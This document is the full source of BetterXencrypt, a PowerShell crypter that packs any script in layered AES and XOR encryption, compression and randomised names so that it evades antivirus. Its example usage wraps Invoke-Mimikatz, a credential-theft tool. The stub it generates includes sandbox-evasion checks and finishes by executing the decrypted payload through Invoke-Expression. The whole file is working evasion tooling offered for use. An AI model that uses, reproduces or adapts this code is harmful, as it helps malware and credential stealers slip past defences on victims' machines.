# Xentropy's Copyright # Xencrypt - PowerShell crypter # Copyright (C) 2020 Xentropy ( @SamuelAnttila ) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . # GetRektBoy724's Copyright # BetterXencrypt - PowerShell crypter # Copyright (C) 2021 GetRektBoy724 # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . Set-StrictMode -Version Latest $ErrorActionPreference = "Stop" $PSDefaultParameterValues['*:ErrorAction']='Stop' function Create-Var() { #Variable length help vary the length of the file generated #old: [guid]::NewGuid().ToString().Substring(24 + (Get-Random -Maximum 9)) $set = "abcdefghijkmnopqrstuvwxyz" (1..(10 + (Get-Random -Maximum 8)) | %{ $set[(Get-Random -Minimum 6 -Maximum $set.Length)] } ) -join '' } function xorEnc { Param ( [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)] [string] $string = $(Throw("oopsie doopsie we made a fucky wucky shit")), [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)] [string] $method = $(Throw("oopsie doopsie we made a fucky wucky shit")), [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)] [string] $key = $(Throw("oopsie doopsie we made a fucky wucky shit")) ) $xorkey = [System.Text.Encoding]::UTF8.GetBytes($key) if ($method -eq "decrypt"){ $string = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($string)) } $byteString = [System.Text.Encoding]::UTF8.GetBytes($string) $xordData = $(for ($i = 0; $i -lt $byteString.length; ) { for ($j = 0; $j -lt $xorkey.length; $j++) { $byteString[$i] -bxor $xorkey[$j] $i++ if ($i -ge $byteString.Length) { $j = $xorkey.length } } }) if ($method -eq "encrypt") { $xordData = [System.Convert]::ToBase64String($xordData) } else { $xordData = [System.Text.Encoding]::UTF8.GetString($xordData) } return $xordData } function Invoke-BetterXencrypt { <# .SYNOPSIS Invoke-BetterXencrypt is a better version of Xencrypt,Xencrypt itself is a Powershell runtime crypter designed to evade AVs,cause Xencrypt is not FUD anymore,i recode the stub and "big bang boom",voila!Its FUD again If you dont know what Xencrypt is,Xencrypt takes any PowerShell script as an input and both packs and encrypts it to evade AV. It also lets you layer this recursively however many times you want in order to foil dynamic & heuristic detection. .DESCRIPTION ____ _ _ __ __ _ | __ ) ___| |_| |_ ___ _ _\ \/ /___ _ __ ___ _ __ _ _ _ __ | |_ | _ \ / _ \ __| __/ _ \ '__\ // _ \ '_ \ / __| '__| | | | '_ \| __| | |_) | __/ |_| || __/ | / \ __/ | | | (__| | | |_| | |_) | |_ |____/ \___|\__|\__\___|_| /_/\_\___|_| |_|\___|_| \__, | .__/ \__| |___/|_| ---------------------------------------------------------------------- [-----------------Your Lovely FUD Powershell Crypter-----------------] [-----------------Recoded With Love By GetRektBoy724-----------------] [------------------https://github.com/GetRektBoy724------------------] Invoke-BetterXencrypt takes any PowerShell script as an input and both packs and encrypts it to evade AV. It also lets you layer this recursively however many times you want in order to attempt to foil dynamic & heuristic detection. Not only that,Invoke-BetterXencrypt-ed script can bypass any behavior monitoring from AVs. Invoke-BetterXencrypt uses AES and XOR encryption with GZip/Deflate compression. Version : v1.4.0 .PARAMETER InFile Specifies the script to encrypt. .PARAMETER OutFile Specifies the output script. .PARAMETER Iterations The number of times the PowerShell script will be packed & crypted recursively. Default is 2. .EXAMPLE PS> Invoke-BetterXencrypt -InFile Invoke-Mimikatz.ps1 -OutFile banana.ps1 -Iterations 3 .LINK https://github.com/GetRektBoy724/BetterXencrypt #> [CmdletBinding()] Param ( [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)] [string] $infile = $(Throw("-InFile is required")), [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)] [string] $outfile = $(Throw("-OutFile is required")), [Parameter(Mandatory=$false,ValueFromPipeline,ValueFromPipelineByPropertyName)] [string] $iterations = 2 ) Process { # a good tool need a good banner ;) $banner = @" ____ _ _ __ __ _ | __ ) ___| |_| |_ ___ _ _\ \/ /___ _ __ ___ _ __ _ _ _ __ | |_ | _ \ / _ \ __| __/ _ \ '__\ // _ \ '_ \ / __| '__| | | | '_ \| __| | |_) | __/ |_| || __/ | / \ __/ | | | (__| | | |_| | |_) | |_ |____/ \___|\__|\__\___|_| /_/\_\___|_| |_|\___|_| \__, | .__/ \__| |___/|_| ---------------------------------------------------------------------- [-----------------Your Lovely FUD Powershell Crypter-----------------] [-----------------Recoded With Love By GetRektBoy724-----------------] [------------------https://github.com/GetRektBoy724------------------] "@ Write-Output "$banner" # read Write-Output "[*] Reading '$($infile)' ..." $codebytes = [System.IO.File]::ReadAllBytes($infile) for ($i = 1; $i -le $iterations; $i++) { # Decide on encryption params ahead of time Write-Output "[*] Starting code layer ..." $paddingmodes = 'PKCS7','ISO10126','ANSIX923','Zeros' $paddingmode = $paddingmodes | Get-Random $ciphermodes = 'ECB','CBC' $ciphermode = $ciphermodes | Get-Random $keysizes = 128,192,256 $keysize = $keysizes | Get-Random $compressiontypes = 'Gzip','Deflate' $compressiontype = $compressiontypes | Get-Random # compress Write-Output "[*] Compressing ..." [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream if ($compressiontype -eq "Gzip") { $compressionStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress) } elseif ( $compressiontype -eq "Deflate") { $compressionStream = New-Object System.IO.Compression.DeflateStream $output, ([IO.Compression.CompressionMode]::Compress) } $compressionStream.Write( $codebytes, 0, $codebytes.Length ) $compressionStream.Close() $output.Close() $compressedBytes = $output.ToArray() # generate key Write-Output "[*] Generating encryption key ..." $aesManaged = New-Object "System.Security.Cryptography.AesManaged" if ($ciphermode -eq 'CBC') { $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC } elseif ($ciphermode -eq 'ECB') { $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::ECB } if ($paddingmode -eq 'PKCS7') { $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 } elseif ($paddingmode -eq 'ISO10126') { $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ISO10126 } elseif ($paddingmode -eq 'ANSIX923') { $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ANSIX923 } elseif ($paddingmode -eq 'Zeros') { $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros } $aesManaged.BlockSize = 128 $aesManaged.KeySize = 256 $aesManaged.GenerateKey() $b64key = [System.Convert]::ToBase64String($aesManaged.Key) # encrypt Write-Output "[*] Encrypting with AES..." $encryptor = $aesManaged.CreateEncryptor() $encryptedData = $encryptor.TransformFinalBlock($compressedBytes, 0, $compressedBytes.Length); [byte[]] $fullData = $aesManaged.IV + $encryptedData $aesManaged.Dispose() $b64encrypted = [System.Convert]::ToBase64String($fullData) #reverse base64 encrypted for obfuscation ;) $reversingb64encrypted = $b64encrypted.ToCharArray() [array]::Reverse($reversingb64encrypted) $b64encryptedreversed = -join($reversingb64encrypted) # xor encrypt Write-Output "[*] Encrypting with XOR ..." # this is a literal fucking hell,i need to fucking set variable names for the goddang xor encryptor/decryptor at the stub $string = Create-Var $method = Create-Var $key = Create-Var $byteString = Create-Var $xordData = Create-Var $xori = Create-Var $xorj = Create-Var # now its the time to XOR encrypt the reversed AES encrypted payload $XOREncKey = Create-Var $base64XOREncPayload = xorEnc -string "$b64encryptedreversed" -method "encrypt" -key "$XOREncKey" # write Write-Output "[*] Finalizing code layer ..." $stub_template = '' # some AV's Dynamic Analysis bypasses $code_alternatives = @() $code_alternatives += '${30} = (Get-Process -Id $PID | Select-Object Name,@{17}Name="WorkingSet";Expression={17}($_.ws / 1024kb){18}{18}).WorkingSet' + "`r`n" $code_alternatives += 'if (${30} -lt 250) {17} ${31} = "a" * 300MB {18}' + "`r`n" $code_alternatives += '${19} = 0' + "`r`n" $code_alternatives += '${20} = 30000000' + "`r`n" $code_alternatives += 'For (${19}=0; ${19} -lt ${20};${19}++) {17} ${19}++ {18}' + "`r`n" $stub_template += $code_alternatives -join '' $code_alternatives = @() $code_alternatives += '${43} = [System.Text.Encoding]::UTF8.GetBytes("{42}")' + "`r`n" $code_alternatives += '${44} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("{0}"))' + "`r`n" $code_alternatives += '${45} = [System.Text.Encoding]::UTF8.GetBytes(${44})' + "`r`n" # start XOR decrypt sequence $code_alternatives += '${46} = $(for (${47} = 0; ${47} -lt ${45}.length; ) {17}' + "`r`n" $code_alternatives += ' for (${48} = 0; ${48} -lt ${43}.length; ${48}++) {17}' + "`r`n" $code_alternatives += ' ${45}[${47}] -bxor ${43}[${48}]' + "`r`n" $code_alternatives += ' ${47}++' + "`r`n" $code_alternatives += ' if (${47} -ge ${45}.Length) {17}' + "`r`n" $code_alternatives += ' ${48} = ${43}.length' + "`r`n" $code_alternatives += ' {18}' + "`r`n" $code_alternatives += ' {18}' + "`r`n" $code_alternatives += '{18})' + "`r`n" $code_alternatives += '${46} = [System.Text.Encoding]::UTF8.GetString(${46})' + "`r`n" $stub_template += $code_alternatives -join '' $code_alternatives = @() $code_alternatives += '${11} = "${46}"' + "`r`n" $code_alternatives += '${9} = ${11}.ToCharArray()' + "`r`n" $code_alternatives += '[array]::Reverse(${9})' + "`r`n" $code_alternatives += '${10} = -join(${9})' + "`r`n" $stub_template += $code_alternatives -join '' $code_alternatives = @() $code_alternatives += '${2} = [System.Convert]::FromBase64String("${10}")' + "`r`n" $code_alternatives += '${3} = [System.Convert]::FromBase64String("{1}")' + "`r`n" #aes managed but its base64 encoded and reversed ;) $code_alternatives += '${24} = "==gCkV2Zh5WYNNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3U"' + "`r`n" $code_alternatives += '${25} = ${24}.ToCharArray()' + "`r`n" $code_alternatives += '[array]::Reverse(${25})' + "`r`n" $code_alternatives += '${26} = -join(${25})' + "`r`n" $code_alternatives += '${12} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(${26}))' + "`r`n" $code_alternatives += '${4} = New-Object "${12}"' + "`r`n" $stub_template += $code_alternatives -join '' $code_alternatives = @() #ciphermode but its base64 encoded and reversed ;) if ($ciphermode -eq "ECB") { $code_alternatives += '${21} = "==gQDVkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W"' + "`r`n" $code_alternatives += '${23} = ${21}.ToCharArray()' + "`r`n" $code_alternatives += '[array]::Reverse(${23})' + "`r`n" $code_alternatives += '${22} = -join(${23})' + "`r`n" $code_alternatives += '${13} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(${22}))' + "`r`n" $code_alternatives += '${14} = & ([scriptblock]::Create(${13}))' + "`r`n" $code_alternatives += '${4}.Mode = ${14}' + "`r`n" }elseif ($ciphermode -eq "CBC") { $code_alternatives += '${21} = "==wQCNkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W"' + "`r`n" $code_alternatives += '${23} = ${21}.ToCharArray()' + "`r`n" $code_alternatives += '[array]::Reverse(${23})' + "`r`n" $code_alternatives += '${22} = -join(${23})' + "`r`n" $code_alternatives += '${13} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(${22}))' + "`r`n" $code_alternatives += '${14} = & ([scriptblock]::Create(${13}))' + "`r`n" $code_alternatives += '${4}.Mode = ${14}' + "`r`n" } #paddingmode but its base64 encoded and reversed ;) if ($paddingmode -eq 'PKCS7') { $code_alternatives += '${27} = "==wNTN0SQpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W"' + "`r`n" $code_alternatives += '${28} = ${27}.ToCharArray()' + "`r`n" $code_alternatives += '[array]::Reverse(${28})' + "`r`n" $code_alternatives += '${29} = -join(${28})' + "`r`n" $code_alternatives += '${15} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(${29}))' + "`r`n" $code_alternatives += '${16} = & ([scriptblock]::Create(${15}))' + "`r`n" $code_alternatives += '${4}.Padding = ${16}' + "`r`n" } elseif ($paddingmode -eq 'ISO10126') { $code_alternatives += '${27} = "==gNyEDMx80UJpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W"' + "`r`n" $code_alternatives += '${28} = ${27}.ToCharArray()' + "`r`n" $code_alternatives += '[array]::Reverse(${28})' + "`r`n" $code_alternatives += '${29} = -join(${28})' + "`r`n" $code_alternatives += '${15} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(${29}))' + "`r`n" $code_alternatives += '${16} = & ([scriptblock]::Create(${15}))' + "`r`n" $code_alternatives += '${4}.Padding = ${16}' + "`r`n" } elseif ($paddingmode -eq 'ANSIX923') { $code_alternatives += '${27} = "==wMykDWJNlTBpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W"' + "`r`n" $code_alternatives += '${28} = ${27}.ToCharArray()' + "`r`n" $code_alternatives += '[array]::Reverse(${28})' + "`r`n" $code_alternatives += '${29} = -join(${28})' + "`r`n" $code_alternatives += '${15} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(${29}))' + "`r`n" $code_alternatives += '${16} = & ([scriptblock]::Create(${15}))' + "`r`n" $code_alternatives += '${4}.Padding = ${16}' + "`r`n" } elseif ($paddingmode -eq 'Zeros') { $code_alternatives += '${27} = "==wcvJXZapjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W"' + "`r`n" $code_alternatives += '${28} = ${27}.ToCharArray()' + "`r`n" $code_alternatives += '[array]::Reverse(${28})' + "`r`n" $code_alternatives += '${29} = -join(${28})' + "`r`n" $code_alternatives += '${15} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(${29}))' + "`r`n" $code_alternatives += '${16} = & ([scriptblock]::Create(${15}))' + "`r`n" $code_alternatives += '${4}.Padding = ${16}' + "`r`n" } $code_alternatives += '${4}.BlockSize = 128' + "`r`n" $code_alternatives += '${4}.KeySize = '+$keysize + "`n" + '${4}.Key = ${3}' + "`r`n" $code_alternatives += '${4}.IV = ${2}[0..15]' + "`r`n" $stub_template += $code_alternatives -join '' $code_alternatives = @() $code_alternatives += '${34} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U3lzdGVtLklPLk1lbW9yeVN0cmVhbQ=="))' + "`r`n" $code_alternatives += '${6} = New-Object ${34}(,${4}.CreateDecryptor().TransformFinalBlock(${2},16,${2}.Length-16))' + "`r`n" $code_alternatives += '${7} = New-Object ${34}' + "`r`n" $stub_template += $code_alternatives -join '' if ($compressiontype -eq "Gzip") { $stub_template += '${40} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("RGVjb21wcmVzcw=="))' + "`r`n" $stub_template += '${41} = & ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W0lPLkNvbXByZXNzaW9uLkNvbXByZXNzaW9uTW9kZV0="))))' + "`r`n" $stub_template += '${35} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U3lzdGVtLklPLkNvbXByZXNzaW9uLkd6aXBTdHJlYW0="))' + "`r`n" $stub_template += '${5} = New-Object ${35} ${6}, (${41}::${40})' + "`r`n" } elseif ( $compressiontype -eq "Deflate") { $stub_template += '${40} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("RGVjb21wcmVzcw=="))' + "`r`n" $stub_template += '${41} = & ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W0lPLkNvbXByZXNzaW9uLkNvbXByZXNzaW9uTW9kZV0="))))' + "`r`n" $stub_template += '${35} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U3lzdGVtLklPLkNvbXByZXNzaW9uLkRlZmxhdGVTdHJlYW0="))' + "`r`n" $stub_template += '${5} = New-Object ${35} ${6}, (${41}::${40})' + "`r`n" } $stub_template += '${5}.CopyTo(${7})' + "`r`n" $code_alternatives = @() $code_alternatives += '${5}.Close()' + "`r`n" $code_alternatives += '${4}.Dispose()' + "`r`n" $code_alternatives += '${6}.Close()' + "`r`n" $code_alternatives += '${36} = & ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W1N5c3RlbS5UZXh0LkVuY29kaW5nXQ=="))))' + "`r`n" $code_alternatives += '${37} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("VVRGOA=="))' + "`r`n" $code_alternatives += '${38} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("VG9BcnJheQ=="))' + "`r`n" $code_alternatives += '${39} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("R2V0U3RyaW5n"))' + "`r`n" $code_alternatives += '${8} = ${36}::${37}.${39}(${7}.${38}())' + "`r`n" $stub_template += $code_alternatives -join '' $stub_template += ('Invoke-Expression','IEX' | Get-Random)+'(${8})' + "`r`n" # it's ugly, but it beats concatenating each value manually. [string]$code = $stub_template -f $base64XOREncPayload, $b64key, (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), ("{"), ("}"), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), $XOREncKey, $key, $string, $byteString, $xordData, $xori, $xorj $codebytes = [System.Text.Encoding]::UTF8.GetBytes($code) } Write-Output "[*] Writing '$($outfile)' ..." [System.IO.File]::WriteAllText($outfile,$code) Write-Output "[+] Done!" } }